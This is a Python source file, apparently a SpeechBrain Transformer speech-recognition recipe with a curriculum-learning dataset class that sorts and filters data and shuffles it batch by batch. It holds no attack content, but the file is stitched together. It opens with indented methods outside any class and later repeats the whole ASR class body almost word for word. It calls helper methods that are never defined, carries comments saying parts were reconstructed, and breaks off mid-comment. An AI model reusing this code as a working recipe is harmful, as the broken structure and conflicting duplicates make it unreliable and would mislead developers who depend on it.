        # save curriculum learning attributes
        self.inter_epoch_dataset_updation = inter_epoch_dataset_updation
        self.ordering = self.hparams.ordering
        self.batch_selection = self.hparams.batch_selection
        self.sortagrad = sortagrad
        # create tensorboard summary writer
        self.tensorboard_writer = SummaryWriter(
            self.hparams.output_folder + "/tensorboard"
        )
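    # Minimal usage sketch (hypothetical wiring shown for context; the real
    # wiring happens in the __main__ block at the bottom of this file):
    #
    #   brain = ASR(
    #       modules=hparams["modules"],
    #       opt_class=hparams["Adam"],
    #       hparams=hparams,
    #       run_opts=run_opts,
    #       checkpointer=hparams["checkpointer"],
    #       sortagrad=5,  # curriculum ordering for the first 5 epochs only
    #   )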
    def compute_forward(self, batch, stage):
        """Forward computations from the waveform batches to the output
        probabilities."""
        batch = batch.to(self.device)
        wavs, wav_lens = batch.sig
        tokens_bos, _ = batch.tokens_bos

        # Add augmentation if specified
        if stage == sb.Stage.TRAIN:
            if hasattr(self.modules, "env_corrupt"):
                wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
                wavs = torch.cat([wavs, wavs_noise], dim=0)
                wav_lens = torch.cat([wav_lens, wav_lens])
                tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)

        # compute features
        feats = self.hparams.compute_features(wavs)
        current_epoch = self.hparams.epoch_counter.current
        feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch)
        if stage == sb.Stage.TRAIN:
            if hasattr(self.hparams, "augmentation"):
                feats = self.hparams.augmentation(feats)

        # forward modules
        src = self.modules.CNN(feats)
        enc_out, pred = self.modules.Transformer(
            src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index
        )

        # output layer for ctc log-probabilities
        logits = self.modules.ctc_lin(enc_out)
        p_ctc = self.hparams.log_softmax(logits)

        # output layer for seq2seq log-probabilities
        pred = self.modules.seq_lin(pred)
        p_seq = self.hparams.log_softmax(pred)

        # Compute outputs
        hyps = None
        if stage == sb.Stage.TRAIN:
            hyps = None
        elif stage == sb.Stage.VALID:
            hyps = None
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch % self.hparams.valid_search_interval == 0:
                # for the sake of efficiency, we only perform beamsearch with
                # limited capacity and no LM to give user some idea of how
                # the AM is doing
                hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens)
        elif stage == sb.Stage.TEST:
            hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens)
        return p_ctc, p_seq, wav_lens, hyps

    def compute_objectives(self, predictions, batch, stage):
        """Computes the loss (CTC+NLL) given predictions and targets."""
        (p_ctc, p_seq, wav_lens, hyps,) = predictions
        ids = batch.id
        tokens_eos, tokens_eos_lens = batch.tokens_eos
        tokens, tokens_lens = batch.tokens
        if hasattr(self.modules, "env_corrupt") and stage == sb.Stage.TRAIN:
            tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0)
            tokens_eos_lens = torch.cat(
                [tokens_eos_lens, tokens_eos_lens], dim=0
            )
            tokens = torch.cat([tokens, tokens], dim=0)
            tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0)

        loss_seq = self.hparams.seq_cost(
            p_seq, tokens_eos, length=tokens_eos_lens
        )
        loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)
        loss = (
            self.hparams.ctc_weight * loss_ctc
            + (1 - self.hparams.ctc_weight) * loss_seq
        )

        if stage != sb.Stage.TRAIN:
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if current_epoch % valid_search_interval == 0 or (
                stage == sb.Stage.TEST
            ):
                # Decode token terms to words
                predicted_words = [
                    self.tokenizer.decode_ids(utt_seq).split(" ")
                    for utt_seq in hyps
                ]
                target_words = [wrd.split(" ") for wrd in batch.wrd]
                self.wer_metric.append(ids, predicted_words, target_words)
            # compute the accuracy of the one-step-forward prediction
            self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens)
        return loss, loss_ctc, loss_seq

    def fit_batch(self, batch):
        """Train the parameters given a single batch in input"""
        # check if we need to switch optimizer
        # if so change the optimizer from Adam to SGD
        self.check_and_reset_optimizer()

        predictions = self.compute_forward(batch, sb.Stage.TRAIN)
        loss, loss_ctc, loss_seq = self.compute_objectives(
            predictions, batch, sb.Stage.TRAIN
        )

        # normalize the loss by gradient_accumulation step
        (loss / self.hparams.gradient_accumulation).backward()

        if self.step % self.hparams.gradient_accumulation == 0:
            # gradient clipping & early stop if loss is not finite
            self.check_gradients(loss)
            self.optimizer.step()
            self.optimizer.zero_grad()
            # anneal lr every update
            self.hparams.noam_annealing(self.optimizer)

        return loss.detach(), loss_ctc.detach(), loss_seq.detach()

    def evaluate_batch(self, batch, stage):
        """Computations needed for validation/test batches"""
        with torch.no_grad():
            predictions = self.compute_forward(batch, stage=stage)
            loss, _, _ = self.compute_objectives(
                predictions, batch, stage=stage
            )
        return loss.detach()
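    # Note on the accumulation logic in fit_batch(): gradients are summed
    # over `gradient_accumulation` consecutive batches before one optimizer
    # step, so the effective batch size is
    # batch_size * gradient_accumulation. E.g. (illustrative numbers)
    # batch_size=8 with gradient_accumulation=4 steps the optimizer once per
    # 32 utterances, and dividing the loss by 4 keeps the gradient magnitude
    # comparable to a true 32-utterance batch.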
    def on_stage_start(self, stage, epoch):
        """Gets called at the beginning of each epoch"""
        if stage != sb.Stage.TRAIN:
            self.acc_metric = self.hparams.acc_computer()
            self.wer_metric = self.hparams.error_rate_computer()

    def on_stage_end(self, stage, stage_loss, epoch):
        """Gets called at the end of an epoch."""
        # Compute/store important stats
        stage_stats = {"loss": stage_loss}
        if stage == sb.Stage.TRAIN:
            self.train_stats = stage_stats
            self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current)
        else:
            stage_stats["ACC"] = self.acc_metric.summarize()
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if (
                current_epoch % valid_search_interval == 0
                or stage == sb.Stage.TEST
            ):
                stage_stats["WER"] = self.wer_metric.summarize("error_rate")

        # log stats and save checkpoint at end-of-epoch
        if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():
            # report different epoch stages according to the current stage
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch <= self.hparams.stage_one_epochs:
                lr = self.hparams.noam_annealing.current_lr
                steps = self.hparams.noam_annealing.n_steps
                optimizer = self.optimizer.__class__.__name__
            else:
                lr = self.hparams.lr_sgd
                steps = -1
                optimizer = self.optimizer.__class__.__name__

            epoch_stats = {
                "epoch": epoch,
                "lr": lr,
                "steps": steps,
                "optimizer": optimizer,
            }
            self.hparams.train_logger.log_stats(
                stats_meta=epoch_stats,
                train_stats=self.train_stats,
                valid_stats=stage_stats,
            )
            self.checkpointer.save_and_keep_only(
                meta={"ACC": stage_stats["ACC"], "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=5,
            )
        elif stage == sb.Stage.TEST:
            self.hparams.train_logger.log_stats(
                stats_meta={"Epoch loaded": self.hparams.epoch_counter.current},
                test_stats=stage_stats,
            )
            with open(self.hparams.wer_file, "w") as w:
                self.wer_metric.write_stats(w)

            # save the averaged checkpoint at the end of the evaluation stage
            # delete the rest of the intermediate checkpoints
            # ACC is set to 1.1 so checkpointer only keeps the averaged checkpoint
            self.checkpointer.save_and_keep_only(
                meta={"ACC": 1.1, "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=1,
            )
class CurriculumOrientedDynamicDataset(DynamicItemDataset):
    """A DynamicItemDataset that can be filtered and sorted according to a
    curriculum-learning specification."""

    def curriculum_based_filtered_sorted(
        self,
        key_min_value={},
        key_max_value={},
        key_test={},
        min_weight=None,
        max_weight=None,
        weights=None,
        ordering_info="",
        batch_selection="contiguous",
        batch_size=8,
        select_n=None,
    ):
        """Get a filtered and/or sorted version of this dataset, based on the
        specified curriculum; shares the static data.

        The reason to implement these operations in the same method is that
        computing some dynamic items may be expensive, and this way the
        filtering and sorting steps don't need to compute the dynamic items
        twice.

        Arguments
        ---------
        key_min_value : dict
            Map from key (in data or in dynamic items) to limit; will only
            keep data_point if data_point[key] >= limit.
        key_max_value : dict
            Map from key (in data or in dynamic items) to limit; will only
            keep data_point if data_point[key] <= limit.
        key_test : dict
            Map from key (in data or in dynamic items) to func; will only
            keep data_point if bool(func(data_point[key])) == True.
        min_weight : None, int
            If not None, will only keep data_point if
            weight[data_point] > min_weight.
        max_weight : None, int
            If not None, will only keep data_point if
            weight[data_point] < max_weight.
        weights : None, dict
            Map from data_id to weight; these weights will be used to sort
            the dataset.
        ordering_info : str
            Information to create weights based on pre-defined keys (and/or
            methods) and their order.
            - Format: "key1:order1,key2:order2,..."
            - Possible values for order: `asc`, `desc`
            - Example:
                * "input_length:asc,output_length:desc" - Sort the dataset
                  using ``input_length`` in ascending order; ties are broken
                  using ``output_length`` in descending order.
            Note: This is used only if `weights` is None.
        batch_selection : str
            Information on how to order batches.
            - Possible values are `contiguous`, `random`, `sorted`,
              `reverse-sorted`
            - Example:
                * "random" - After the dataset is ordered based on
                  `ordering_info`, divide the dataset into batches of size
                  `batch_size` and order these batches randomly to create the
                  final dataset.
        batch_size : int
            Used to divide the dataset into batches (default 8). This helps
            in ordering the dataset at batch level.
        select_n : None, int
            If not None, only keep (at most) the first n filtered
            data_points. The possible sorting is applied, but only on the
            first n data points found.

        Returns
        -------
        FilteredSortedDynamicItemDataset
            Shares the static data, but has its own output keys and dynamic
            items (initially deep copied from this, so they have the same
            dynamic items available).
        """
        # ordering type can be random or sorted; keys for ordering info can
        # be input_length, output_length, alphabetic
        dataset_ordering = self._parse_dataset_order(ordering_info)
        ordering_type = "sorted" if len(dataset_ordering) > 0 else "random"

        filtered_data_ids = self._filter_dataset(
            self.data_ids, key_min_value, key_max_value, key_test
        )

        # order entire dataset
        if ordering_type == "random":
            weights = self._random_shuffled_weights(filtered_data_ids)
        elif ordering_type == "sorted":
            if weights is None:
                # Create dataset weights from the parsed ordering info
                weights = self._custom_sorted_weights(
                    filtered_data_ids, dataset_ordering
                )
        else:
            raise NotImplementedError(
                "Ordering Type must be one of random, sorted, weighted_sorted."
            )

        # order batchwise
        if batch_selection == "contiguous":
            pass
        elif batch_selection == "random":
            weights = self._random_shuffled_batches(weights, batch_size)
        elif batch_selection == "sorted":
            pass
        elif batch_selection == "reverse-sorted":
            weights = self._reverse_sort_batches(weights, batch_size)
        else:
            raise NotImplementedError(
                "batch_selection must be one of contiguous, random, sorted,"
                " reverse-sorted."
            )

        # Build the final id list for the Dataloader using the weights
        filtered_sorted_ids = self._weighted_filtered_sorted_ids(
            weights, min_weight, max_weight, select_n
        )
        return FilteredSortedDynamicItemDataset(self, filtered_sorted_ids)
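    def _demo_curriculum_sketch(self):
        """Illustrative sketch only (not part of the original recipe): a
        typical call combining filtering, sorting, and batch-level shuffling.
        Assumes `self` was built via `from_csv` on a LibriSpeech-style csv
        with `duration` and `wrd` columns."""
        return self.curriculum_based_filtered_sorted(
            # drop utterances longer than 30 seconds
            key_test={"duration": lambda d: float(d) <= 30.0},
            # shortest audio first; ties broken by longest transcript first
            ordering_info="input_length:asc,output_length:desc",
            # keep each 32-utterance batch sorted, but shuffle the batches
            batch_selection="random",
            batch_size=32,
        )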
    def _filter_dataset(
        self, data_ids, key_min_value={}, key_max_value={}, key_test={}
    ):
        """Returns a list of data ids fulfilling the filtering criteria."""

        def combined_filter(computed, key_min_value, key_max_value, key_test):
            """Checks if the data example fulfills the filtering criteria"""
            for key, limit in key_min_value.items():
                if computed[key] >= limit:
                    continue
                return False
            for key, limit in key_max_value.items():
                if computed[key] <= limit:
                    continue
                return False
            for key, func in key_test.items():
                if bool(func(computed[key])):
                    continue
                return False
            return True

        temp_keys = (
            set(key_min_value.keys())
            | set(key_max_value.keys())
            | set(key_test.keys())
        )
        filtered_data_ids = []
        with self.output_keys_as(temp_keys):
            for i, data_id in enumerate(data_ids):
                data_point = self.data[data_id]
                data_point["id"] = data_id
                computed = self.pipeline.compute_outputs(data_point)
                if combined_filter(
                    computed, key_min_value, key_max_value, key_test
                ):
                    filtered_data_ids.append(data_id)
        return filtered_data_ids

    def _weighted_filtered_sorted_ids(
        self, weights, min_value=None, max_value=None, select_n=None, reverse=False
    ):
        """Returns a list of data ids, filtered and sorted using custom weights."""

        def weights_filter(weights, min_value, max_value):
            """Checks if the data example has weight within the range
            (`min_value`, `max_value`)"""
            if min_value is None and max_value is None:
                return weights
            if isinstance(min_value, int):
                min_value = float(min_value)
            if isinstance(max_value, int):
                max_value = float(max_value)
            # iterate over a copy, since entries are removed while iterating
            for key, value in list(weights.items()):
                if (isinstance(min_value, float) and value < min_value) or (
                    isinstance(max_value, float) and value > max_value
                ):
                    weights.pop(key, None)
            return weights

        filtered_weights = weights_filter(weights, min_value, max_value)
        filtered_ids = [
            (weight, i, data_id)
            for i, (data_id, weight) in enumerate(filtered_weights.items())
        ]
        filtered_sorted_ids = [
            tup[2] for tup in sorted(filtered_ids, reverse=reverse)
        ][:select_n]
        return filtered_sorted_ids
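    def _demo_filtering_sketch(self):
        """Illustrative sketch only (not part of the original recipe): keep
        utterances between 1 and 20 seconds that have a non-empty transcript,
        using the filtering hook above. Assumes `duration` and `wrd` columns
        as in the LibriSpeech csvs."""
        return self._filter_dataset(
            self.data_ids,
            key_test={
                "duration": lambda d: 1.0 <= float(d) <= 20.0,
                "wrd": lambda w: len(w) > 0,
            },
        )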
    def _parse_dataset_order(self, dataset_order=""):
        """Takes `ordering_info` as a string and parses it into a list of
        {"key": ..., "order": ...} dictionaries."""
        ordering_info = []
        orderings = dataset_order.split(",")
        for order in orderings:
            if order.strip() == "":
                continue
            column, order = order.split(":")
            ordering_info.append({"key": column, "order": order})
        return ordering_info

    def _random_shuffle_data_ids(self, data_ids):
        """Shuffle the data_ids in random order."""
        return np.random.permutation(data_ids)

    def _random_shuffled_weights(self, data_ids):
        """Create random weightages for data_ids."""
        shuffled_ids = self._random_shuffle_data_ids(data_ids)
        weights = {}
        for index, id in enumerate(shuffled_ids):
            weights[id] = index
        return weights
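    # Illustrative note (not in the original source): for
    # ordering_info = "input_length:asc,output_length:desc",
    # _parse_dataset_order returns
    #     [{"key": "input_length", "order": "asc"},
    #      {"key": "output_length", "order": "desc"}]
    # and _random_shuffled_weights maps each data id to its position in a
    # random permutation, e.g. {"utt3": 0, "utt1": 1, "utt2": 2}.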
    def _custom_sorted_weights(self, data_ids, dataset_orderings):
        """Create `weights` for data points using the parsed `ordering_info`."""

        def compare(key1, key2):
            """Comparing logic; `ordering_info` can contain multiple keys.
            Note: value and its meaning
            *  1 - key1 > key2
            * -1 - key1 < key2
            *  0 - key1 = key2
            """
            res = 0
            for ordering in dataset_orderings:
                key = ordering["key"]
                order = 1 if ordering["order"] == "asc" else -1
                if key == "input_length":
                    res = self._input_length_comparator(key1, key2)
                elif key == "output_length":
                    res = self._output_length_comparator(key1, key2)
                elif key == "alphabetic":
                    res = self._alphabetic_comparator(key1, key2)
                res = order * res
                # if `key` ranked the data points as equal, continue
                # comparing using the next key, else return the result
                if res == 0:
                    continue
                else:
                    return res
            return res

        shuffled_data_ids = self._random_shuffle_data_ids(data_ids)
        sorted_data_ids = sorted(shuffled_data_ids, key=cmp_to_key(compare))
        weights = {}
        for index, id in enumerate(sorted_data_ids):
            weights[id] = index
        return weights

    def _input_length_comparator(self, key1, key2):
        """Compare two data points based on input length (audio duration)."""
        duration1 = float(self.data[key1]["duration"])
        duration2 = float(self.data[key2]["duration"])
        if duration1 > duration2:
            return 1
        elif duration1 < duration2:
            return -1
        else:
            return 0

    def _output_length_comparator(self, key1, key2):
        """Compare two data points based on output (transcript) length."""
        length1 = len(self.data[key1]["wrd"])
        length2 = len(self.data[key2]["wrd"])
        if length1 > length2:
            return 1
        elif length1 < length2:
            return -1
        else:
            return 0

    def _alphabetic_comparator(self, key1, key2):
        """Compare two data points based on alphabetic order of the transcript."""
        text1 = self.data[key1]["wrd"]
        text2 = self.data[key2]["wrd"]
        if text1 > text2:
            return 1
        elif text1 < text2:
            return -1
        else:
            return 0
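    @staticmethod
    def _demo_multikey_compare():
        """Illustrative sketch only (not part of the original recipe):
        multi-key comparison with functools.cmp_to_key on toy records,
        mirroring what _custom_sorted_weights does with real data."""
        data = {
            "a": {"duration": 2.0, "wrd": "HELLO WORLD"},
            "b": {"duration": 2.0, "wrd": "HI"},
            "c": {"duration": 1.0, "wrd": "HEY"},
        }

        def compare(k1, k2):
            # primary key: duration ascending
            res = (data[k1]["duration"] > data[k2]["duration"]) - (
                data[k1]["duration"] < data[k2]["duration"]
            )
            if res != 0:
                return res
            # tie-break: transcript length descending
            return -(
                (len(data[k1]["wrd"]) > len(data[k2]["wrd"]))
                - (len(data[k1]["wrd"]) < len(data[k2]["wrd"]))
            )

        # "c" is shortest; "a" beats "b" on the descending tie-break
        return sorted(data.keys(), key=cmp_to_key(compare))  # -> ["c", "a", "b"]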
    def _random_shuffled_batches(self, weights=None, batch_size=8, reverse=False):
        """Randomly shuffle the dataset at batch level."""
        # order the data ids by their current weight
        data_count = len(weights)
        ordered_ids = [None] * data_count
        for data_id, weight in weights.items():
            ordered_ids[weight] = data_id
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.random.permutation(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += ordered_ids[start_index:end_index]
        assert (
            len(shuffled_data_ids) == data_count
        ), "OOPS!! Batchwise shuffling gone wrong."
        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights

    def _reverse_sort_batches(self, weights=None, batch_size=8):
        """Reverse sort the dataset at batch level."""
        data_count = len(weights)
        ordered_ids = [None] * data_count
        for data_id, weight in weights.items():
            ordered_ids[weight] = data_id
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.flipud(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += ordered_ids[start_index:end_index]
        assert (
            len(shuffled_data_ids) == data_count
        ), "OOPS!! Batchwise shuffling gone wrong."
        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights
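# Illustrative sketch only (not part of the original recipe): batch-level
# shuffling on ten toy ids with batch_size=4, mirroring
# `_random_shuffled_batches` above. Each 4-utterance batch keeps its internal
# (sorted) order, but the batches themselves appear in random order.
def _demo_batchwise_shuffle():
    weights = {"utt{}".format(i): i for i in range(10)}  # already sorted
    data_count = len(weights)
    ordered = [None] * data_count
    for data_id, w in weights.items():
        ordered[w] = data_id
    batch_size = 4
    batch_count = math.ceil(data_count / batch_size)  # = 3 batches: 4 + 4 + 2
    shuffled = []
    for b in np.random.permutation(np.arange(batch_count)):
        shuffled += ordered[batch_size * b : min(batch_size * (b + 1), data_count)]
    return {data_id: idx for idx, data_id in enumerate(shuffled)}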
class ASR(sb.core.Brain):
    r"""Brain class abstracting away the details of data loops.

    The primary purpose of the `Brain` class is the implementation of the
    ``fit()`` method, which iterates epochs and datasets for the purpose of
    "fitting" a set of modules to a set of data.

    In order to use the ``fit()`` method, one should sub-class the ``Brain``
    class and override any methods for which the default behavior does not
    match the use case. For a simple use case (e.g., training a single model
    with a single dataset) the only methods that need to be overridden are:

    * ``compute_forward()``
    * ``compute_objectives()``

    The example below illustrates how overriding these two methods is done.
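    Example
    -------
    (Reconstructed from the base ``Brain`` class docstring; shown here for
    illustration only. ``SimpleBrain`` and its toy data are not part of this
    recipe.)

    >>> from torch.optim import SGD
    >>> class SimpleBrain(sb.core.Brain):
    ...     def compute_forward(self, batch, stage):
    ...         return self.modules.model(batch[0])
    ...     def compute_objectives(self, predictions, batch, stage):
    ...         return torch.nn.functional.l1_loss(predictions, batch[0])
    >>> model = torch.nn.Linear(in_features=10, out_features=10)
    >>> brain = SimpleBrain({"model": model}, opt_class=lambda x: SGD(x, 0.1))
    >>> brain.fit(range(1), ([torch.rand(10, 10), torch.rand(10, 10)],))
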
    For more complicated use cases, such as multiple modules that need
    separate updates, the following methods can also be overridden:

    * ``fit_batch()``
    * ``evaluate_batch()``
    * ``update_average()``

    If the initialization was done with distributed_count > 0 and the
    distributed_backend is ddp, this will generally handle multiprocess
    logic, like splitting the training data into subsets for each device and
    only saving a checkpoint on the main process.

    Arguments
    ---------
    modules : dict of str:torch.nn.Module pairs
        These modules are passed to the optimizer by default if they have
        trainable parameters, and will have ``train()``/``eval()`` called on
        them.
    opt_class : torch.optim class
        A torch optimizer constructor that takes only the list of parameters
        (e.g., a lambda or partial function definition). By default, this
        will be passed all modules in ``modules`` at the beginning of the
        ``fit()`` method. This behavior can be changed by overriding the
        ``configure_optimizers()`` method.
    hparams : dict
        Each key:value pair should consist of a string key and a
        hyperparameter that is used within the overridden methods. These will
        be accessible via an ``hparams`` attribute, using "dot" notation:
        e.g., self.hparams.model(x).
    run_opts : dict
        A set of options to change the runtime environment, including

        debug (bool)
            If ``True``, this will only iterate a few batches for all
            datasets, to ensure code runs without crashing.
        debug_batches (int)
            Number of batches to run in debug mode, default ``2``.
        debug_epochs (int)
            Number of epochs to run in debug mode, default ``2``. If a
            non-positive number is passed, all epochs are run.
        jit_module_keys (list of str)
            List of keys in ``modules`` that should be jit compiled.
        distributed_count (int)
            Number of devices to run on.
        distributed_backend (str)
            One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``.
        device (str)
            The location for performing computations.
        auto_mix_prec (bool)
            If ``True``, automatic mixed-precision is used. Currently, it
            works only with cuda.
        max_grad_norm (float)
            Default implementation of ``fit_batch()`` uses ``clip_grad_norm_``
            with this value. Default: ``5``.
        nonfinite_patience (int)
            Number of times to ignore non-finite losses before stopping.
            Default: ``3``.
        noprogressbar (bool)
            Whether to turn off the progressbar when training. Default:
            ``False``.
        ckpt_interval_minutes (float)
            Amount of time between saving intra-epoch checkpoints, in
            minutes, default: ``15.0``. If non-positive, these are not saved.
    checkpointer : speechbrain Checkpointer
        By default, this will be used to load checkpoints, and will have the
        optimizer added to continue training if interrupted.
    inter_epoch_dataset_updation : bool
        Whether the dataset must be updated between epochs or not. It is used
        in curriculum learning (CL), which may reshuffle or re-sort the
        dataset. By default, it is ``False``.
    sortagrad : int
        Number of epochs for which the curriculum-based dataset must be used.
        It can take one of the following values:

        * ``-1`` - Use curriculum learning for all epochs
        * ``n`` - Use curriculum learning for ``n`` number of epochs

        By default, it is ``-1``.
    """

    def __init__(
        self,
        modules=None,
        opt_class=None,
        hparams=None,
        run_opts=None,
        checkpointer=None,
        inter_epoch_dataset_updation=False,
        sortagrad=-1,
    ):
        super().__init__(
            modules=modules,
            opt_class=opt_class,
            hparams=hparams,
            run_opts=run_opts,
            checkpointer=checkpointer,
        )
        # save the curriculum learning settings
        self.inter_epoch_dataset_updation = inter_epoch_dataset_updation
        self.ordering = self.hparams.ordering
        self.batch_selection = self.hparams.batch_selection
        self.sortagrad = sortagrad
        # create tensorboard summary writer (the log directory was not
        # recoverable from the source; SummaryWriter() defaults to ./runs)
        self.tensorboard_writer = SummaryWriter()
    def compute_forward(self, batch, stage):
        """Forward computations from the waveform batches to the output
        probabilities."""
        batch = batch.to(self.device)
        wavs, wav_lens = batch.sig
        tokens_bos, _ = batch.tokens_bos

        # Add environmental corruption if present
        if hasattr(self.modules, "env_corrupt") and stage == sb.Stage.TRAIN:
            wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
            wavs = torch.cat([wavs, wavs_noise], dim=0)
            wav_lens = torch.cat([wav_lens, wav_lens])
            tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)

        # compute features
        feats = self.hparams.compute_features(wavs)
        current_epoch = self.hparams.epoch_counter.current
        feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch)

        if stage == sb.Stage.TRAIN:
            if hasattr(self.hparams, "augmentation"):
                feats = self.hparams.augmentation(feats)

        # forward modules
        src = self.modules.CNN(feats)
        enc_out, pred = self.modules.Transformer(
            src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index
        )

        # output layer for ctc log-probabilities
        logits = self.modules.ctc_lin(enc_out)
        p_ctc = self.hparams.log_softmax(logits)

        # output layer for seq2seq log-probabilities
        pred = self.modules.seq_lin(pred)
        p_seq = self.hparams.log_softmax(pred)

        # Compute outputs
        hyps = None
        if stage == sb.Stage.TRAIN:
            hyps = None
        elif stage == sb.Stage.VALID:
            hyps = None
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch % self.hparams.valid_search_interval == 0:
                # for the sake of efficiency, we only perform beamsearch with
                # limited capacity and no LM to give the user some idea of
                # how the AM is doing
                hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens)
        elif stage == sb.Stage.TEST:
            hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens)

        return p_ctc, p_seq, wav_lens, hyps

    def compute_objectives(self, predictions, batch, stage):
        """Computes the loss (CTC+NLL) given predictions and targets."""
        (p_ctc, p_seq, wav_lens, hyps,) = predictions

        ids = batch.id
        tokens_eos, tokens_eos_lens = batch.tokens_eos
        tokens, tokens_lens = batch.tokens

        if hasattr(self.modules, "env_corrupt") and stage == sb.Stage.TRAIN:
            tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0)
            tokens_eos_lens = torch.cat(
                [tokens_eos_lens, tokens_eos_lens], dim=0
            )
            tokens = torch.cat([tokens, tokens], dim=0)
            tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0)

        loss_seq = self.hparams.seq_cost(
            p_seq, tokens_eos, length=tokens_eos_lens
        )
        loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)
        loss = (
            self.hparams.ctc_weight * loss_ctc
            + (1 - self.hparams.ctc_weight) * loss_seq
        )

        if stage != sb.Stage.TRAIN:
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if current_epoch % valid_search_interval == 0 or (
                stage == sb.Stage.TEST
            ):
                # Decode token terms to words
                predicted_words = [
                    self.tokenizer.decode_ids(utt_seq).split(" ")
                    for utt_seq in hyps
                ]
                target_words = [wrd.split(" ") for wrd in batch.wrd]
                self.wer_metric.append(ids, predicted_words, target_words)

            # compute the accuracy of the one-step-forward prediction
            self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens)
        return loss, loss_ctc, loss_seq
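    # Illustrative note (not in the original source): with ctc_weight = 0.3,
    # the joint objective above is
    #     loss = 0.3 * loss_ctc + 0.7 * loss_seq
    # e.g., loss_ctc = 2.0 and loss_seq = 1.0 give loss = 0.6 + 0.7 = 1.3.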
    def fit_batch(self, batch):
        """Train the parameters given a single batch in input"""
        # check if we need to switch optimizer;
        # if so, change the optimizer from Adam to SGD
        self.check_and_reset_optimizer()

        predictions = self.compute_forward(batch, sb.Stage.TRAIN)
        loss, loss_ctc, loss_seq = self.compute_objectives(
            predictions, batch, sb.Stage.TRAIN
        )

        # normalize the loss by the gradient_accumulation step
        (loss / self.hparams.gradient_accumulation).backward()

        if self.step % self.hparams.gradient_accumulation == 0:
            # gradient clipping & early stop if loss is not finite
            self.check_gradients(loss)

            self.optimizer.step()
            self.optimizer.zero_grad()

            # anneal lr every update
            self.hparams.noam_annealing(self.optimizer)

        return loss.detach(), loss_ctc.detach(), loss_seq.detach()

    def evaluate_batch(self, batch, stage):
        """Computations needed for validation/test batches"""
        with torch.no_grad():
            predictions = self.compute_forward(batch, stage=stage)
            loss, _, _ = self.compute_objectives(predictions, batch, stage=stage)
        return loss.detach()

    def on_stage_start(self, stage, epoch):
        """Gets called at the beginning of each epoch"""
        if stage != sb.Stage.TRAIN:
            self.acc_metric = self.hparams.acc_computer()
            self.wer_metric = self.hparams.error_rate_computer()

    def on_stage_end(self, stage, stage_loss, epoch):
        """Gets called at the end of an epoch."""
        # Compute/store important stats
        stage_stats = {"loss": stage_loss}
        if stage == sb.Stage.TRAIN:
            self.train_stats = stage_stats
            self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current)
        else:
            stage_stats["ACC"] = self.acc_metric.summarize()
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if (
                current_epoch % valid_search_interval == 0
                or stage == sb.Stage.TEST
            ):
                stage_stats["WER"] = self.wer_metric.summarize("error_rate")

        # log stats and save checkpoint at end-of-epoch
        if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():
            # report different epoch stages according to the current stage
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch <= self.hparams.stage_one_epochs:
                lr = self.hparams.noam_annealing.current_lr
                steps = self.hparams.noam_annealing.n_steps
                optimizer = self.optimizer.__class__.__name__
            else:
                lr = self.hparams.lr_sgd
                steps = -1
                optimizer = self.optimizer.__class__.__name__

            epoch_stats = {
                "epoch": epoch,
                "lr": lr,
                "steps": steps,
                "optimizer": optimizer,
            }
            self.hparams.train_logger.log_stats(
                stats_meta=epoch_stats,
                train_stats=self.train_stats,
                valid_stats=stage_stats,
            )
            self.checkpointer.save_and_keep_only(
                meta={"ACC": stage_stats["ACC"], "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=5,
            )
        elif stage == sb.Stage.TEST:
            self.hparams.train_logger.log_stats(
                stats_meta={"Epoch loaded": self.hparams.epoch_counter.current},
                test_stats=stage_stats,
            )
            with open(self.hparams.wer_file, "w") as w:
                self.wer_metric.write_stats(w)

            # save the averaged checkpoint at the end of the evaluation stage
            # and delete the rest of the intermediate checkpoints;
            # ACC is set to 1.1 so the checkpointer only keeps the averaged
            # checkpoint
            self.checkpointer.save_and_keep_only(
                meta={"ACC": 1.1, "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=1,
            )
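    # Illustrative note (not in the original source): with
    # hparams.gradient_accumulation = 4, `fit_batch` above backpropagates
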